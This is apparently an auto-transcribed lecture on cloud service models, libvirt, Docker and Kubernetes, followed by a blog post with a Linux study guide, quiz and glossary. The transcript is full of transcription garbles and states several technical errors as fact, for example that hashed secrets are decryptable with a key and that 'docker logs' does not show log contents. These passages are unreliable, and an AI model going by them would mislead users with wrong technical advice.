flexible obviously accessible so cloud services are accessible from anywhere with an internet connection you just need your laptop and now you can log into your cloud service providers your CSP and then from there get access to whatever it is that you were using from your home office for example um they’re reliable they’re available because they have redundant locations so AWS micro uh Amazon’s uh web services they have warehouses all over the globe that house these servers that are connected to the AWS service and if one of those things goes down it just defaults into the next available one in that region and now the whoever the person is that’s using it never has to worry about losing access to what it is that they need to use and this is very very important because the redundancy portion of this the Redundant server warehouses that exist all over the world literally all over the world these redundant warehouses are the main reason why these services are so reliable and available all the time uh Disaster Recovery as long as you have enabled some kind of a backup you will never use your lose your data and as long as obviously you’re paying your bill that’s the other part so it’s like as long as you’re paying your bill and you’ve done a scheduled backup uh you will never lose your data and you will never lose your service your server will always be on your web server your application server will always be on and running so the and these were just the three major Heavy Hitters we were talking about there are a lot of different cloud service providers that are also very legitimate and they have a lot of great resources that are available so uh these were just the three big ones the three Heavy Hitters that we were talking about and then you have of course the automatic update so you don’t need to update your computer uh you don’t need to update the service it just gets updated on your behalf and you don’t have to worry about making sure your it team is on top of it or that you if you’re the the sole proprietor the administrator and the CEO and everything you don’t have to worry about updating anything because it’ll be automatically done for you the security will be updated for you uh all of it is very very convenient process there there’s a lot of different conveniences that are available for using cloud computing but this is another really big one because with updates and uh automatic updates with automatic updates there is a lot of security that is uh enforced and a lot of convenience that is also enforced because as things get more streamlined uh then you will just get those updates as things get um hacked into so as pen testing is done and they upgrade their security infrastructure you will also inherit those benefits as well so cloud computing is a very flexible scalable cost efficient and just awesome way of going into virtualization and you have the infrastructure as a service I AAS platform as a service p p p a a oh my God and then s AAS as a service and I’ll show you what the visual of that also looks like this is kind of the best image that I was able to find all the other ones are they’re similar to spreadsheets or something like that or like a pyramid that doesn’t really give you much um so I AAS the infrastructure as a service you can see that this is basically what the web server looks like or the servers that are inside of those massive warehouses that’s what it looks like and this is what you’re renting and these things can help you deploy virtual machines and virtual computers for people to use and then those people can then use uh install their own um for example operating systems on top of them or they can install their own applications and develop new applications so on and so forth so this is the most uh base level of ser service that you would get which on top of this you can essentially do anything that you want but you would need it people you would need a team of people to be able to do this for you right and then you have platform as a service right so it they give you the servers obviously but then they also give you the operating systems so you could just launch a Windows machine or a Linux machine instead of only launching a server and then on top of the server having to use your hypervisor to install the operating systems you would just launch one you would just launch launch the operating system and then from there you can start developing your code or you can start running your business whatever it may be right so this one requires the most configuration because you do need to use a hypervisor to be able to install the virtual machines and then install the operating systems and then launch them this one you just launch the operating system with a couple of clicks and now you have access to a Linux computer or Windows computer right and then the last one is assuming that all these things are already configured for you you have to do no configuration and then you just launch the application so Google Drive for example you just launch Google Drive right and that’s the the the most convenient version of this uh Trio because there is very little configuration that’s required from your behalf you just log into the application and you start using the software and that’s basically it right so this one requires the most configuration because somebody needs to use a hypervisor and install the uh operating system install the Linux or uh ver windows or whatever it is uh launch the virtual machine all of those things this is the most configuration this is the least configuration and then this is the middle ground right here that with a couple of clicks you’re now launching a Linux machine and then now you use the Linux machine and use the applications inside of it or you launch a Windows machine so on and so forth so this is the trio that we have over here which falls under as a service this infrastructure plat platform and then software as a service it’s probably also a good idea for us to talk about some of these Cloud survivers uh providers excuse me uh these are again the big three that we got over here so Amazon AWS Microsoft as well as Google um they offer a comprehensive list of services um and they’re comparable you know they’re very comparable to each other it’s just I guess kind of defends on Personal Taste and personal preferences um where they would uh differ or where somebody would choose one over the other maybe pricing would also play into that but for the most part uh they all pretty much offer uh similar range of services so AWS is you know the most popular Believe It or Not Amazon is not just a Marketplace their biggest profit comes from their web services their AWS web services because for the most part they have the same infrastructure that’s set up and then on top of that they’re just selling uh access to their resources on a variety of different tiers and it includes computering power of course storage options networking abilities um I host my website one of my websites actually all my websites but I don’t have one specific that’s launched for this channel yet uh I did buy the hack Alix Anonymous domain through AWS so that’s a really cool one and uh that’s basically it like it it just offers uh computing power storage options and networking capabilities that makes it great for everybody individual users Enterprises government entities so on and so forth um their key services are the elastic compute Cloud so ec2 uh lamb Lambda excuse me which is serverless Computing so you don’t need an actual computer or server excuse me and you can just get access to uh computing power just using their platform and then elastic beanock which is the platform as a service and then storage would be the simple storage service which is S3 elastic Block store and then Glacier which is for long-term storage Amazon web services databases uh runs across the variety of different services or levels of services as well so you have the relational database service you have Dynamo DB which is no SQL database and then you have the red shift for warehousing data warehousing which is kind of falling into cold stor storage and then you have networking so virtual private Cloud Route 53 for DNS services cloudfront for Content delivery Network and this is their list of key services and then we have the management consoles and the management tools so uh the interface for managing AWS resources would be the Management console the AWS CLI for the command line interface to interact with their services programmatically as well as script wise and then you have the software development kits the sdks for integrating AWS Services into applications using programming languages so python sdks are very common thing to understand when you’re interacting with the API of any service you will look for a python SDK and you will import it into your uh software or not your software excuse me you will import it into your project file and then that SDK will allow you to interact with the API of that service for example in this case AWS AWS has an SDK you can import that into your python project and then now you can interact with your AWS management uh environment as long as you have your your token and your API key so on and so forth to confirm that you actually have access to their services now you can interact with those services using a variety of apis and software development kits so uh very very cool portion of it and again also all of these guys have sdks just to let let you know so Microsoft Azure is another one it’s the competitor to AWS uh seamless integration with Microsoft products Azure offers a wide range of cloud services including compute analytic storage and networking you have the compute and storage portion so aure virtual machines Azure functions which is the serverless Computing Azure kubernetes service which is a really big one a lot of people actually ask for this uh inside job descriptions you have the Azure blob storage Azure disk storage and Azure files you have the databases which is the SQL database Cosmos DB which is the nosql database asure database for post SQL and MySQL and then we have Azure virtual Network Azure load balancer and content delivery Network which is for their CDN and then you have their management tools which would be the Azure portal the command line interface and of course Powershell scripting language and then they also have an SDK that you can interact with and then we have Google cloud which is for capabilities in data analytics and machine learning uh they have a robust set of cloud services that leverage the infrastructure of Google the massive infrastructure that they have like Computing storage application development uh Google compute engine the kubernetes engine and Cloud functions are all under their Computing section you have the storage so cloud storage persistent disk file store Google Drive for example and then you have the databases cloudsql Cloud spanner which which is the regional database and of course fir store which is the nosql document database and then networking for virtual private Cloud so VPC Cloud load balancing and Cloud CDN and then this is their management tool so Cloud console the cloud CLI and the client libraries for integrating into applications using programming languages so the client libraries would be similar to the SDK the CLI as you can tell every single one of them has a CLI and every decent cloud computing provider should have a CLI and then the console which is the GU the graphic user interface for management of all of your resources and assets via Google Cloud so that’s what we got over here obviously scalable obviously cost-efficient we’ve talked about all these things flexibility security all of those things and the Advanced Services like the AI stuff machine learning stuff and the big data analytics enabling you to innovate and stay competitive uh this is becoming more and more uh required to be competitive in the modern business world to have some kind of an AI assistant or some kind of AI uh integration with your infrastructure to make things more efficient and respond faster machine learning to just be on top of your competition with the research that’s being done and to improve your data sets and your infrastructure because machines learn faster and better and more consistently than human beings do and then you have the big data analytic stuff which is uh it’s very very crazy that how much data actually exists in the world and how important it is to be able to ingest all of that data and make sense of it and these things are connected to each other so the big data analytics connected to the machine learning which is done by an AI all of those things are interconnected and they’re I feel like they’re almost mandatory at this state of the the modern technology world and how technology has been connected to business I feel like these things are absolutely mandatory and if you want to be really really good as a cyber security person as a administrator a tech person it you need to really get comfortable with the concepts of machine learning and big data and using AI Integrations so that you can just stay ahead of the curve when it comes down to your competition inside of the IT world and the cyber security and pentesting and system administration World in summary we got these major Cloud providers but they are not the only ones and uh I would challenge you to Google what the major Cloud providers are and see what you can find out there and how they rank as far as their competitiveness to these big three right here um there is a lot of tools available as we already talked about there’s infrastructure platform as well as software that is available as a service and they have a lot of great management tools including the consoles as well as the command line interfaces as well as the SDK the software development kits that integrate well with programming languages to provide further automation capabilities and these are the big three as we talked about all right so you got your VMS up you got your containers and all the things that are provided to you by your virtual EnV environment how do you manage these things that’s what we’re going to talk about so lib vert would be the first command line tool that is available for us and it’s a toolkit that is connected W via API and it’s used for interacting with VMS across a bunch of different platforms like KVM uh kemu Zen and VMware it’s consistent because it works across all of these different platforms and it’s a very popular choice we’ve already mentioned it actually hopefully you remember uh as we talked about D virtualization portion earlier we did mention lib vert already um it offers a unified API for managing the VMS across different hypervisors uh simp it simplifies the VM management as a result and makes it so that the use of a consistent scent of commands and tools would basically work everywhere depending on doesn’t matter where you are and what you’re using as your virtualization technology Tech ology um ver would be one of the key features that comes with lip vert and then vert install with the command line tool for creating and installing a new virtual machine so these are the two command line tools that come with vert and it’s compatible again as we already talked about so it works with the various virtualization Technologies it’s a versatile tool for various virtualization environments and this is kind of what a command looks like to use uh lib verts specifically to create a virtual machine so there are a few elements here that we need to go over so vert install would be the command line tool to install a new machine the name is what you’re going to give it and then this is how much memory should be allocated to it the vcpus that would be allocated to it and then the dis which is this is going to be the path that’s going to go for this particular dis and then the variation of the OS that you’re going to be installing which is essentially the OS image that you want to use to complete your installation so this is the breakdown the full breakdown of this we have the vert install which is to create and install a new virtual machine inside of lip vert then you have the name that you’re going to give it so what you want the virtual machine to be called the allocation of 248 megabytes of ram to this particular VM which is basically 2 gigs worth of ram that you’re giving to this virtual machine the process processing power that it has vcpu which is the virtual CPU that’s going to be assigned to this virtual machine which is in this case two CPUs that are going to be assigned to it and then this is the path so the dis image for the VM with a size of 20 Gigabytes and the 20 GB in this particular case is storage so we’re not talking about the processing power of Ram or the processing power of the CPU we’re just talking about storage for this particular machine and it’s going to get 20 GB and then of course the OS variant which is the operating system for this particular case which is Ubuntu 20.04 so this is how you create a new virtual machine using vert install inside of lib vert and this is the full thing if we were to actually provide some fillers in here so the name would be my Ubuntu VM same uh RAM capacity that we’re assigning to it same vcpus that we’re assigning to it and then this will be the full path that’s going to this thing and then we’re going to allocate 20 gigs of storage to it and then you have the OS variant which is Ubuntu and in the CD ROM wow look at that there’s a CD ROM image as well that’s going to be the path for this particular case it’s being pulled from a CD ROM so this OS variant is being pulled from the CD ROM partition which is the path to that particular cdrom partition and then this is how you destroy one I love that word so you destroy a virtual machine using the verse destroy so vert install is how you create one and then to it destroy it you would need to use ver and so again you just give it the virtual machine name that we got here so my Ubuntu VM would be the name that we give it and then it destroys it it forcibly stops the specified VM with the name that you want and actually destroys it so my Ubuntu VM in this particular case is being destroyed if you wanted to list your virtual machines you would do list list all and it lists everything that’s being managed by lib vert showing their IDs their names their current state whether or not their run uh running paused or shut off and then this would be an example output for that which is in this particular case you got three so the May Ubuntu VM the test virtual machine and the old virtual machine and because of the fact that this one is shut off and this one is paused their IDs are not activated so the only one that actually has this ID that’s associated to it is the one that’s currently running running and this would be the output that you would get from listing the all virtual machines with ver so this is the the flow here that we got so as an example we want to create a virtual machine in this case which is the my sentos Cent OS being one of the red hat distributions of Linux there is 4 GB of RAM assigned to this particular one there is four CPUs assigned to it the dis location the path to this virtual VM is going to be here and then there’s 40 GB of storage that’s assigned to it and then the orus variant is Centos and then it’s being pulled from the cdrom partition for Centos installation that has the iso image on it and that’s it this is how you install one with the Cent OS if you wanted to destroy that same machine you would use ver so again vert install installs this one ver is the one that we use to destroy this thing and it immediately stops it and then if you want to list everything you would do the list all command so lip vert is the toolkit for managing virtual machines across a variety of virtualization platforms it’s consistent meaning that you can use those same exact commands across a variety of different uh hypervisors and virtualization environments and all of those commands would run exactly as they are and then you would have ver for the management and vert install for the installation of the various virtual machines that you got and this is our summary of commands so 3 2 1 moving on okay so now we got to manage our Dockers okay um Dockers significantly or excuse me the containers of the docker my bad so the docker is the tool and the containers are the stuff that we manage with the docker tool so uh Docker simplifies the deployment and management of the applications which are stored inside of these containers and these are the microser Services uh and the architectures around them and the packages of applications along with all of their dependencies inside their isolated containers right so you have the docker which is the tool and the container is the container that houses the the applications the dependencies of those applications and everything else that would be used in something called a micro service so basically just running the various applications uh for example that Ubuntu example that we saw earlier that would just run uh the various applications and the dependencies that would be uh inherent that would be ingrained inside of a Ubuntu environment without actually launching an Ubuntu operating system so you would pull the image meaning downloading it from the docker Hub which would be housed on a variety of different cloud service providers or any other container registry really and then you would pull that from that location into your actual local machine your computer you would download that into your local machine so for example we’re going to pull inin in this particular case and pull that image into our local machine and then you want to run it right so you start the new container in detached mode meaning that it’s going to run in the background and then you would replace that with the name of the docker image that you want to use for example inin what we had in the previous case so run the inin and it’ll run the inin container in the background and it’ll return the container ID for you and once you have that you can do a variety of different things with that container like run it and actually use it and then when you’re done with it if you want to remove it you would need to provide the container ID so we got the container ID by running it inside of the uh background in the background and you can also run the list command as we saw uh to be able to give you the list of the containers that you have as well as their container IDs and then you can use the RM command to remove that container ID or the RMI command to remove the named uh image that you download the named container that you downloaded so remove my container in this particular case uh this would be the one that removes the container um this is my container uh that would be the name I would assume but not the the container ID itself so um we have the logs of those containers so uh the logs of the specified container which does not mean that it’s displaying the contents of those logs um you would need to access that either with Nano or some kind of a text editor or viewer or let’s say IDs or a Sim tool something like that but essentially you can view all of the logs that are associated with that individual container meaning the authentication authorization log the the logs for any errors that may have taken place or just regular interactions that were done with that particular container you can retreat retrieve all of those via the logs command so logs of my container would be retrieved by running Docker logs my container and then you have the PS which will list all of the current running containers so this is how you would get the actual container names their IDs the statuses and any other details and then this is how you would get the ID to be able to remove it for example or to be able to get the logs from it for example so this will be the example output in this particular case I know it’s a little bit small but this is where the container ID is uh listed you have the image which is in Jinx in this case the command line entry for this which is the uh Docker entry point and it it runs much longer than that uh you have the fact that it was created 2 hours ago it’s been running for 2 hours there are no ports associated with it because it’s running on the local machine and then the name is the Serene bassi that has been associated with this in Jinx server so PSA not the public service analment but PS sa a as the listing of all of the containers including all the ones that are stopped so we had the PS that was running something that is running right so it’s going to show you the stuff that’s currently running PSA will show you everything that is stopped or uh deleted or any maybe not deleted but probably the ones that are stopped uh either paused or uh deactivated and then you would see what those uh IDs are and what their names are so on and so forth and then you can stop one that’s currently running so if if you wanted to stop it Docker stop and then give it the container ID these are very very easy commands to remember but you already have this video as a cheat sheet as well so it stops Serene Bassie right so that was in the container ID this was the name that was associated with it the container ID is this piece right here so there’s a little bit of a glitch with these instructions so my bad that’s my bad on this particular case but you you get it right so if you give it the container ID you would need to give it this information right here which is the container ID not the the nickname that has been assigned to it which is Serene bassi in this particular case um if you want to remove it by its image name then you would do RMI and then you would give it the image name which is in this particular case the in Jinx which would be the image name right here so that is the the value that we would give the RMI version which is in this case we see in jinx as our example and so that’s it Docker is the tool that helps you uh deploy and manage applications uh that are stored inside of containers and containers house the applications as well as all of their dependencies to be able to run them and we already went through all of the key commands and this is just kind of the cheat sheet for you so to be able to pull it meaning download it onto your local machine you would use Docker pull to be able to run it you would do Docker run and to remove it you would do RM or RMI you can do PS to list them PSA to list all of them including the ones that are not running running and that’s basically it as far as the docker itself is concerned you also do need to learn how to orchestrate or manage your containers uh to just make sure that uh number one they’re not past their life cycle or if they’re done being used you get rid of them especially in a large scale environment because it does take up a lot of storage to be able to do something like that so kubernetes is something that is done or is used for that for the orchestration of the uh container ERS that would be in that environment Docker swarm is another one that can help you automate deployment scaling up or scaling down management of containerized applications to make sure that they’re running when they need to they’re efficient everything is all good and then when they’re done you get rid of them uh kubernetes is a very popular one uh it’s also it’s also abbreviated as k8s so kubernets uh it’s an uh open source platform for automating the deployment scaling and management of containerized applications and it’s great for really anything um especially in a large environment so automatic deployment and scaling because it actually works with um a variety of different script templates that come into play as well as rules and policies that you can assign it so you can automatically deploy something um and say that you know for this particular uh image for this in Jinx I want you to to create 100 different versions of this and deploy those 100 different versions and it’s very very good at automatically deploying something like that you can load balance and Route traffic so just based on the traffic size of your environment and the company that you’re working with you can make sure that the physical servers don’t crash because load balancing is very directly related to that so uh balancing the load of traffic that’s coming in and routing that traffic efficiently so that the containers run smoothly but the physical infrastructure is also running and it’s available without anything crashing that’s really basically what load balancing and traffic routing is uh selfhealing is an interesting one um because if anything fails to start so it’ll just be replaced or it will be automatically restarted um if anything that isn’t working repetitively will be killed I love that it kills containers that don’t respond to userdefined health checks and it doesn’t advertise them to clients until they are ready to serve right so it’ll just do everything that it needs to do and once it’s actually ready for the person who wants to use it it’ll just say this is ready to serve but until then in the background it’ll restart something it’ll heal it if it needs to be done it’ll kill it and wipe it and then go get a version of it that’s working and then bring it up and then give it to to the client or the user so that they can actually use it and then it can help you manage the storage as well to make sure that the persistent storage is actually uh deployed as needed it’s mounted as it’s needed and this is all something that kubernetes is done beautifully uh automatically so to speak um then there’s the security portion of this so if you have sensitive information which a lot of people do like passwords and API Keys it helps you manage those things securely which basically means either it won’t display them or if it does display them it’ll be done as hash values which is basically encrypted values that look like a bunch of randomized text that nobody can make sense of and they can’t be decrypted without the key that has been assigned to the administrator or to the user so there there’s no way to decrypt them or to decode them uh because it’s just a very nice algorithm that’s been used for the encryption and then there’s a key that’s attached to it that anybody without that key would not be able to decrypt those contents Docker swarm is docker’s native clustering and orchestration Tool so it essentially does uh what kubernetes does it’s just a little bit simpler um and it helps you orchestrate and manage your containers uh especially environments that actually already are using Docker so simplified setup management um it’s integrated with Docker tools seamlessly so it actually works very well if you’re already using Docker for your particular environment um there’s an ability to scale your services up or down very similar to kubernetes um by adjusting the number of replicas as I already mentioned so you can just say I want you to create 50 versions of this 100 versions of this so on and so forth load balancing same thing that it’ll help with the network traffic so that these Services don’t crash or they don’t overexert the physical infrastructure um it’s secure by default meaning that it actually has TLS encryption which is the more advanced version of SSL encryption that typically runs on top of Port 443 for uh https for web traffic um so TLS is actually very powerful encryption standard for secure communication between nodes in the Swarm cluster which is a very fancy way of saying a variety of different containers or tools that are trying to communicate with each other inside of this massive environment so it provides secure encrypted conversation between all of these various nodes or these various different uh containers that are trying to communicate with each other and it does it seamlessly and securely so to want to do all of these things with kubernetes as an example if you want to deploy a in Jinx environment you would do kubernetes so CP CTL is the command that interacts with kubernetes you do Coupe CTL create a deployment of in Jinx and then use the image inin right so it creates a deployment named inin using the official ninx image very very simple to do uh scale it is very interesting and this can a lot of these things can also be embedded inside of scripts that can be running so you just run the script and it’ll do this for you but again scale the deployment of in Jinx and multiply that by three so it scales this inin to deployment to three replicas this deployment would be done in three replicas how easy is that that’s crazy then you wanted to get the pods so list all the pods that are running in the cluster which essentially contain these three replicas or as many replicas as you would have so you would get them you would list all of those pods contained in that cluster and then the doer version of it would be to use the Swarm initialization first so you need to use Docker to actually initialize swarm first and then that cluster would be that uh stuff that has been managed and so you would interact with that swarmed cluster so you would do service creation and then give it a web so you’re using the web name in this particular case you’re going to create three replicas it’s going to be on Port 80 and it’s going to be inin so it creates a service named web with three replicas using the inin image in this particular case and Maps the port 80 on the host to Port 80 on the container meaning that’s it’s actually what’s used for web traffic so Port 80 is for HTTP traffic so it’s only appropriate that we use port 80 for our web service that has been created with the docker swarm if you want to list all of the services you would just use the ls command which is very intuitive to Linux cuz that is the command that we use to list anything inside of Linux containers or inside of Linux directories I guess and that’s it for the container or orchestration these two tools obviously go much deeper and there is a lot of documentation and a lot of uh tutorials that are available for both Docker swarm as well as kubernetes it’s just I want you to know about them so if you wanted to do more homework and self- teing you know where to go and what you’re supposed to look for and they’re very powerful tools because they both automate the deployment of multiple replicas as they said uh of anything really so it could be a Linux machine Linux virtual machine it could be an in Jinx uh web server it could be anything that can virtually be deployed uh inside of a container and it would be done times a thousand if needed and it’s as simple as saying hey create replicas equals a th000 and then all of a sudden now you have a thousand replicas of that same container so it’s a very very powerful series of tools kubernetes and Docker swarm and there’s obviously other versions of container orchestration tools as well these are just the most popular and the most relevant to the conversations that we’ve had so I do encourage you to check into uh orchestration of containers using either Docker Docker swarm kubernetes or anything that would be similar to it because it would make you much more functional as a Linux admin administrator and overall as just a system administrator this training series is sponsored by hackaholic Anonymous to get the supporting materials for this series like the 900 page slideshow the 200 Page notes document and all of the pre-made shell scripts consider joining the agent here of hack holics Anonymous you’ll also get monthly python automations exclusive content and direct access to me by a Discord join hack Alix Anonymous today this training series is sponsored by hack alic an on to get the supporting materials for this series like the 900 page slideshow the 200 Page notes document and all of the pre-made shell scripts consider joining the agent tier of hack holics Anonymous you’ll also get monthly python automations exclusive content and direct access to me via Discord join hack alic Anonymous today

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog

  • Linux System Administration: Permissions, Partitions, and Security

    Linux System Administration: Permissions, Partitions, and Security

    This resource is a guide to Linux system administration, covering essential topics for the Linux+ certification. It thoroughly explains system architecture, including the file system hierarchy and key directories, as well as boot processes. The text also discusses partition management, detailing file system types, mount points, and commands for manipulating disk partitions. User and group management, file permissions, and special permissions are all explained. Finally, the document explains monitoring system performance and managing processes via command line tools.

    Linux Study Guide

    Quiz

    Instructions: Answer each question in 2-3 sentences.

    1. What is the role of Linus Torvalds in the Linux operating system, and what title was given to him?
    2. Explain the difference between the Linux kernel and a Linux distribution (distro). Provide two examples of popular Linux distros.
    3. Name three common uses for Linux operating systems, beyond desktop computing.
    4. Describe the purpose of the /bin and /sbin directories. What is the key distinction between them regarding user access?
    5. What is the purpose of /dev/null and /dev/zero?
    6. Briefly explain the function of journaling in file systems like EXT4 and XFS.
    7. What are the key differences between the FAT32 and NTFS file systems? What are the common use cases of each file system?
    8. Explain the roles of the kernel, the shell, and the user space in the Linux system architecture.
    9. What is the purpose of the /etc/fstab file?
    10. Explain the difference between a hard link and a symbolic link (soft link) in Linux.

    Quiz Answer Key

    1. Linus Torvalds is the creator of the Linux kernel and maintains ultimate authority over its development. He is known as the “benevolent dictator of Planet Linux,” as his approval is needed for incorporating code into the kernel.
    2. The Linux kernel is the core of the operating system, while a Linux distribution (distro) is a complete OS that bundles the kernel with other software, utilities, and a desktop environment. Ubuntu and Kali Linux are two examples of popular Linux distributions.
    3. Linux operating systems are used in servers (web, database), embedded systems (IoT devices, routers), and cloud computing platforms (AWS, Google Cloud).
    4. The /bin directory contains essential binary executables accessible to all users, while the /sbin directory holds system binaries used for administration, which typically require root privileges.
    5. /dev/null is a “black hole” that discards any data written to it, often used to suppress output. /dev/zero produces an infinite stream of null characters, useful for initializing storage or testing memory.
    6. Journaling is a feature that records file system changes in a journal before they are applied. This improves data integrity and recoverability in case of a system crash or power failure.
    7. FAT32 is an older file system with limited file size support, primarily used for USB drives. NTFS is a modern file system used by Windows, offering security features, compression, and large file support, but typically only accessible by Windows.
    8. The kernel manages system resources and communication between hardware and software. The shell is a command-line interpreter allowing users to interact with the kernel. The user space is where user-level applications execute, isolated from the kernel for stability and security.
    9. The /etc/fstab file contains a list of file systems that should be automatically mounted at boot time, along with their mount points and options.
    10. A hard link is a direct reference to a file’s data, creating a duplicate entry. A symbolic link (soft link) is a file that stores the path to another file acting as a shortcut.

    Essay Questions

    1. Discuss the advantages and disadvantages of using Linux in an enterprise environment compared to other operating systems. Consider factors like cost, stability, security, and the availability of support.
    2. Explain the importance of file permissions in Linux. How do traditional file permissions (user, group, other) and special permissions (SUID, GUID, sticky bit) contribute to system security and access control?
    3. Compare and contrast the systemd and SysVinit initialization systems. What are the key benefits of systemd over SysVinit, and why has it become the standard in modern Linux distributions?
    4. Describe the process of partitioning a hard drive in Linux. What are the differences between primary, extended, and logical partitions, and how are they used to organize a file system?
    5. Explain how shell scripting can be used to automate system administration tasks in Linux. Provide examples of common scripting tasks and discuss the advantages of using scripts over manual commands.

    Glossary of Key Terms

    • Binaries: Executable files containing compiled code.
    • BIOS (Basic Input/Output System): Firmware used to perform hardware initialization during the booting process on older systems.
    • Bootloader: Software that loads the operating system kernel.
    • CLI (Command Line Interface): A text-based interface for interacting with the operating system.
    • Daemon: A background process that runs without direct user interaction.
    • Dev: Directory containing device files, providing a virtual interface to hardware.
    • Distro (Distribution): A complete Linux operating system that includes the kernel and additional software.
    • EXT4 (Fourth Extended Filesystem): A journaling file system commonly used in Linux.
    • FHS (Filesystem Hierarchy Standard): A standard that defines the directory structure and contents in Linux.
    • File System: A method of organizing and storing files on a storage device.
    • GPT (GUID Partition Table): A partitioning scheme that supports larger disk sizes and more partitions than MBR.
    • GNU: An open-source, Unix-like operating system.
    • GUI (Graphical User Interface): A visual interface for interacting with the operating system.
    • Kernel: The core of the Linux operating system.
    • Linux: An open-source operating system kernel.
    • Mount Point: A directory where a file system is attached to the directory tree.
    • MBR (Master Boot Record): A traditional partitioning scheme that limits the number of partitions on a disk.
    • Nas (Network Attached Storage): A server that attaches to a network and enables other users to access the same data.
    • NTFS (New Technology File System): The file system used by modern Windows operating systems.
    • Open Source: Software with source code that is freely available and can be modified and distributed.
    • Partition: A section of a hard drive or other storage device.
    • Process: An instance of a program that is running in memory.
    • Root: The top-level directory in the Linux file system, represented by /.
    • Sbin: System binaries; executables used for system administration.
    • Shell: A command-line interpreter that allows users to interact with the kernel.
    • SUID (Set User ID): A special permission that allows a program to be executed with the privileges of its owner.
    • Swap Space: Disk space used as virtual memory when RAM is full.
    • Symbolic Link (Soft Link): A file that stores the path to another file acting as a shortcut.
    • Systemd: A system and service manager for Linux.
    • UEFI (Unified Extensible Firmware Interface): A modern firmware interface used to initialize hardware during the booting process.
    • User Space: The environment where user-level applications execute, isolated from the kernel.
    • XFS: A high-performance journaling file system commonly used in enterprise environments.

    Linux Fundamentals and System Administration Training

    Okay, here’s a detailed briefing document summarizing the main themes and important ideas from the provided excerpts.

    Briefing Document: Linux Fundamentals and Administration

    Overview:

    This document summarizes a comprehensive training on Linux fundamentals and system administration. The training covers a wide range of topics, from the history of Linux and its various distributions to file system management, process management, user authentication, and scripting. The primary focus is on equipping users with the knowledge and practical skills necessary to effectively navigate, manage, and secure Linux systems. The training utilizes a lecture format coupled with practical command-line exercises. Access to supplemental materials, including a detailed Google Document and an extensive slide presentation, is offered as part of a membership program.

    Main Themes & Key Ideas:

    1. Linux History and Distributions:
    • Linux was created as a free and open-source alternative to Minix/Unix, spearheaded by Linus Torvalds and Richard Stallman. “the goals for this were to make it free make it open source alternative to Minix uh which was based on Unix and that’s the guy lonus tals he’s still around and he’s still the the father of Linux.”
    • Linux Distributions (Distros) bundle the Linux kernel with other software, each tailored for specific purposes.
    • Popular Distros include:
    • Ubuntu: User-friendly, for general users and desktop environments. “Ubuntu which is the most commonly used uh it’s popular for General users beginners and people who want to use Linux in the desktop environment”
    • CentOS/Red Hat Enterprise Linux (RHEL): Stable, supported, for enterprise environments. “sent OS AKA Red Hat Enterprise Linux or real and these things are used in Enterprise environments so they’re mainly for stability and support”
    • Debian: Servers and advanced users, often command-line focused. “Debian is known for servers and advanced users mostly because the fact that you’re not going to get a graphic user interface”
    • Fedora: Cutting-edge, for developers. “Fedora which is great for developers and it’s more Cutting Edge and it has a lot of Innovations and utilities that are pre-installed on it”
    • Kali Linux: Cyber security and ethical hacking. “Cali Linux and it’s for cyber security and ethical hackers which is US everybody that comes on this channel”
    • Linux has Common Uses in servers, embedded systems/IoT devices, software development, cyber security, cloud and data centers. “servers embedded systems and iot devices iot devices are internet of things”
    1. File System Hierarchy and Navigation:
    • The File System Hierarchy Standard (FHS) defines a consistent directory structure across Linux distributions. Key directories include / (root), /bin (binaries), /sbin (system binaries), /etc (configuration files), /home (user directories), /var (variable data), /tmp (temporary files), and /dev (device files). ” the the home of everything is the root and it’s represented by this singular forward slash”
    • The /bin directory contains essential binary executables, accessible to all users. “the bin or the binaries directory contains essential binary executables that are needed during the boot process or in single user mode”
    • The /sbin directory contains binary executables for system administration, requiring root privileges. “the sbin is known as the system binaries folder and this is the binary executables that are used for system administration it typically requires root privileges to execute this”
    • The /dev directory provides a virtual interface to physical devices. “the dev folder important uh device abstraction by treating devices as files Linux provides a consistent interface for interacting with various Hardware devices”
    • Common commands for navigation: pwd (print working directory), ls (list files), cd (change directory).
    • Commands for file manipulation: cp (copy), mv (move/rename), rm (remove), mkdir (make directory), rmdir (remove directory).
    1. File Systems:
    • ext4: A widely used file system balancing performance and reliability. “xt4 which is balanced performance reliability and is known to be compatible with all different versions of the OS”
    • xfs: Designed for performance and scalability, popular in enterprise environments and large databases. “xfs the xfs file system uh it’s for performance and scalability it’s a very popular choice in Enterprise environment”
    • NTFS: Used in modern Windows operating systems, requires consideration for cross-platform compatibility. “NTFS the new technology file system is actually a file system that’s been used in modern Windows operating systems it’s reliable it’s secure performs well”
    • FAT32: Commonly used for USB flash drives and external hard drives (max 2TB), compatible with various OSes. “fat 32 for the most part is being used by one individual person for like a home computer or something like that or maybe a USB drive or an external hard drive that is maxed out at 2 terabytes”
    • Formatting tools: mkfs (make file system) can format partitions in different file systems, and requires backing up data as formatting wipes the data. “mkfs is used to format partitions with different file systems”
    1. System Architecture: Kernel, Shell, User Space
    • Kernel: The core component, acting as the bridge between hardware and software. It manages system resources. “the kernel um it’s the core component of a Linux based operating system it’s basically the bridge between the hardware and the software layers”
    • Shell: A command-line interpreter that allows users to interact with the kernel. “the shell is a command line interpreter that facilitates communication with the kernel”
    • User Space: The environment where user-level applications execute, separated from the kernel for stability and security. “user space is the environment where the user level applications actually execute”
    1. Boot Process:
    • BIOS/UEFI: Initializes hardware and passes control to the bootloader.
    • Bootloader (e.g., GRUB): Loads the operating system kernel.
    • Init System (e.g., systemd, SysVinit): Starts system services and processes. “init is actually the traditional initialization system that was used in Linux dros to start system services and processes during brute”
    • systemd is faster, flexible, feature rich, current version of the init system.
    1. Package Management and Installation:
    • Selecting a Linux distribution is based on the task to accomplish. There are desktop versions, server versions, and security versions, etc.
    • The process of flashing an ISO image to a USB drive using tools like Etcher is covered.
    • The presenter demonstrates how to find the assigned drive to the USB device before flashing the ISO image.
    1. Partitions and Mounting:
    • Understanding the concept of primary, extended, and logical partitions. The function of partitioning is creating containers to contain the files.
    • Mounting file systems: Attaching a file system to a directory to make it accessible. “when you mount something you’re attaching the file system to a directory so that it’s accessible within the larger directory tree”
    • /etc/fstab: Configuration file defining file systems to be automatically mounted at boot. “ETFs tab uh configuration file that defines all the file systems that should be automatically mounted when you start your system”
    1. Swap Space:
    • Swap space acts as virtual memory when physical RAM is exhausted, preventing out-of-memory errors. “swap a buffer to prevent out of memory errors meaning that the system can’t run because the physical memory has been maxed out”
    • Creating swap partitions or swap files is covered.
    1. Process and Service Management:
    • Processes, daemons, and services and the relationship between them.
    • Daemons are background processes.
